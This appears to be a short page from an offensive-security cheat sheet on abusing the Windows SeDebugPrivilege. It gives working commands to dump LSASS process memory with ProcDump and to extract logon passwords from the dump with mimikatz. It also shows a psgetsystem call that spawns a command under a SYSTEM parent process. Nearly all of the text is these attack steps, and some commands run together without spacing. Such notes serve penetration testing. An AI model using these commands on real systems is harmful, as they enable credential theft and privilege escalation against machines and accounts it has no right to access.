SeDebugPrivilege
Creds
Use ProcDump to dump lsass:
procdump.exe -accepteula -ma lsass.exe lsass.dmpThen load it into mimikatz with following commands:
logsekurlsa::minidump lsass.dmpsekurlsa::logonpasswordsCan also manually create dump file from task manager
RCE
Use psgetsystem
[MyProcess]::CreateProcessFromParent(<system_pid>,<command_to_execute>,"")Last updated
Was this helpful?